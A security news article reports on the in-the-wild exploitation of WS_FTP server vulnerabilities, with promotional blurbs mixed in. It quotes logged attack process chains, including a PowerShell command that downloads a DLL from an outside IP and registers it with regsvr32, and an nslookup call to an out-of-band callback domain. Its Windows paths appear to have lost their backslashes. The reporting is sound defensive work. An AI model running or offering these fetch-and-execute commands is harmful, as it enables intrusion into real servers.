As previously reported, Progress-owned WS_FTP was discovered with multiple vulnerabilities associated with cross-site scripting (XSS), SQL injection, cross-site request forgery, unauthenticated user enumeration, and a few others.
Progress has warned their users about the WS_FTP vulnerabilities and released a security advisory mentioning the fixed version of the WS_FTP server. Additionally, they have also requested their users to upgrade to the latest version.
Vulnerabilities Exploited in the Wild
According to the reports shared with Cyber Security News, these vulnerabilities were discovered to be exploited by threat actors in the wild. On investigating further, the exploit chain of execution was found to be the same across all the observed instances.
Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware
It was also mentioned that this could mean that there has been a mass exploitation of the vulnerable WS_FTP servers. The collected logs also consisted of one particular burp suite domain on all the recorded incidents which means that a single threat actor is doing the mass exploitation.
However, all the execution chain of commands has been listed below.
Great-grandparent Process:
C:WindowsSysWOW64inetsrvw3wp.exe -ap “WSFTPSVR_WTM” -v “v4.0” -l “webengine4.dll” -a \.pipeiisipm18823d36-4194-409a-805b-cea0f4389a0c -h “C:inetpubtempapppoolsWSFTPSVR_WTMWSFTPSVR_WTM.config” -w “” -m 1 -t 20 -ta 0 |
Grandparent Process:
C:WindowsMicrosoft.NETFrameworkv4.0.30319csc.exe” /noconfig /fullpaths @”C:WindowsMicrosoft.NETFrameworkv4.0.30319Temporary ASP.NET Filesahte514712ba2ab2de1ryvjavth.cmdline |
Parent Process:
C:WindowsMicrosoft.NETFrameworkv4.0.30319cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 “/OUT:C:WindowsTEMPRES6C8F.tmp” “c:WindowsMicrosoft.NETFrameworkv4.0.30319Temporary ASP.NET Filesahte514712ba2ab2de1CSCCEF3EFC08A254FF1848B4D8FBBA6D0CE.TMP |
Child Process:
C:WindowsSystem32cmd.exe” /c cmd.exe /C nslookup 2adc9m0bc70noboyvgt357r5gwmnady2.oastify.com |
As per the reports, the Attack chain had the below command executions.
Great-grandparent Process:
C:WINDOWSSysWOW64inetsrvw3wp.exe -ap “WSFTPSVR_WTM” -v “v4.0” -l “webengine4.dll” -a \.pipeiisipme6a8a618-bb7f-470c-92e9-58204f6ffcfa -h “C:inetpubtempapppoolsWSFTPSVR_WTMWSFTPSVR_WTM.config” -w “” -m 1 -t 20 -ta 0 |
Grandparent Process:
C:WindowsSystem32cmd.exe” /c powershell /c “IWR http://172.245.213[.]135:3389/bcrypt -OutFile c:userspublicNTUSER.dll |
Parent Process:
powershell /c “IWR http://172.245.213[.]135:3389/bcrypt -OutFile c:userspublicNTUSER.dll |
Child Process:
C:WindowsSystem32cmd.exe” /c regsvr32 c:userspublicNTUSER.dll |
Furthermore, a complete report has been published by Rapid7, which provides detailed information about the recorded incidents, mitigations, and other information.
Protect yourself from vulnerabilities using Patch Manager Plus to quickly patch over 850 third-party applications. Take advantage of the free trial to ensure 100% security.